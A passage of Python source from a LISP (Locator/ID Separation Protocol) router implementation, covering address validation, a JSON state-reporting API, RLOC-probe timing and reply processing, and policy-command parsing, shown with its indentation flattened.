try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the lisp-core process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
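# Illustrative request strings (parameter values hypothetical):
#
#   "map-cache%"                                          # entire map-cache
#   'map-cache%{"instance-id": "0", "eid-prefix": "10.0.0.0/8"}'
#   'map-server%{"dns-name": "ms.example.com"}'
#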
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache-summary"):
data = lisp_process_api_site_cache_summary(lisp_sites_by_eid)
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = lisp_fill_rloc_in_json(rloc)
#
# If this is a multicast RLOC, then add the array for member RLOCs
# that may have responded to a multicast RLOC-probe.
#
if (rloc.rloc.is_multicast_address()):
r["multicast-rloc-set"] = []
for mrloc in rloc.multicast_rloc_probe_list.values():
mr = lisp_fill_rloc_in_json(mrloc)
r["multicast-rloc-set"].append(mr)
#endfor
#endif
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_fill_rloc_in_json
#
# Fill in fields from lisp_rloc() into the JSON that is reported via the
# restful API.
#
def lisp_fill_rloc_in_json(rloc):
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
r["rloc-probe-latency"] = rloc.rloc_probe_latency
r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
return(r)
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. If so, make the group the destination
# and the EID the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache_summary
#
# Returns:
#
# [ { "site" : '<site-name>", "registrations" : [ {"eid-prefix" : "<eid>",
# "count" : "<count>", "registered-count" : "<registered>" }, ... ]
# } ]
#
def lisp_process_api_site_cache_summary(site_cache):
site = { "site" : "", "registrations" : [] }
entry = { "eid-prefix" : "", "count" : 0, "registered-count" : 0 }
sites = {}
for ml in site_cache.cache_sorted:
for se in site_cache.cache[ml].entries.values():
if (se.accept_more_specifics == False): continue
if (sites.has_key(se.site.site_name) == False):
sites[se.site.site_name] = []
#endif
e = copy.deepcopy(entry)
e["eid-prefix"] = se.eid.print_prefix()
e["count"] = len(se.more_specific_registrations)
for mse in se.more_specific_registrations:
if (mse.registered): e["registered-count"] += 1
#endfor
sites[se.site.site_name].append(e)
#endfor
#endfor
data = []
for site_name in sites:
s = copy.deepcopy(site)
s["site"] = site_name
s["registrations"] = sites[site_name]
data.append(s)
#endfor
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this site-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-server or map-resolver configuration to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of configured database-mappings, including dynamic data like
# the translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. If so, make the group the destination
# and the EID the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID configured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
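# Illustrative sketch (prefixes and instance-IDs hypothetical): with two
# multi-tenant clauses on the same device, say 10.0.0.0/8 with instance-id
# 2000 and 10.1.0.0/16 with instance-id 1000, a source EID of 10.1.1.1
# best-matches the /16 and instance-id 1000 is returned.
#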
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns the dynamic-eid-device (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for becomes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probing
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
glean, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (glean and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but different translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
#
# Copy last-rloc send probe timer, so all EIDs using the
# same RLOC can have sync'ed rtts.
#
parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending an RLOC-probe if we just received a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr = red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reinstall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
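# Illustrative IPC message built below (hypothetical RTR address):
# "rtr%1.2.3.4%up" when the RTR becomes reachable and "rtr%1.2.3.4%down"
# when it becomes unreachable.
#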
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# unconditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if the RTR address is in the lisp_rtr_list the lisp-itr process
# learned from the map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
mrloc):
rloc = rloc_entry.rloc
nonce = map_reply.nonce
hc = map_reply.hop_count
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
jt = rloc_entry.json.json_string if rloc_entry.json else None
ts = lisp_get_timestamp()
#
# If this RLOC-probe reply is in response to a RLOC-probe request to a
# multicast RLOC, then store all responses. Create a lisp_rloc() for new
# entries.
#
if (mrloc != None):
multicast_rloc = mrloc.rloc.print_address_no_iid()
if (mrloc.multicast_rloc_probe_list.has_key(map_reply_addr) == False):
nrloc = lisp_rloc()
nrloc = copy.deepcopy(mrloc)
nrloc.rloc.copy_address(rloc)
nrloc.multicast_rloc_probe_list = {}
mrloc.multicast_rloc_probe_list[map_reply_addr] = nrloc
#endif
nrloc = mrloc.multicast_rloc_probe_list[map_reply_addr]
nrloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
nrloc.last_rloc_probe = mrloc.last_rloc_probe
r, eid, group = lisp_rloc_probe_list[multicast_rloc][0]
nrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
return
#endif
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr):
if (rloc.translated_port != 0 and rloc.translated_port != port):
continue
#endif
#endif
rloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endfor
return(count)
#enddef
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
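# Illustrative example (assumed bytes, not from the original header): given
# the raw record bytes "www.example.com\0<rest-of-record>", the function
# returns the tuple ("<rest-of-record>", "www.example.com").
#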
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of flow entries whose last
# element is a lisp_packet. This function is called and run in its own
# thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
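# Illustrative kv_pair shape (an assumption inferred from how the loop below
# indexes values): match parameters arrive as parallel arrays with one slot
# per match clause, while set parameters arrive as scalar strings. For
# example, a policy with two match clauses might be passed as:
#
#   { "policy-name" : "p1", "datetime-range" : ["", ""],
#     "source-eid" : ["[1000]10.0.0.0/8", "[1000]192.168.0.0/16"],
#     "set-action" : "drop" }
#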
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
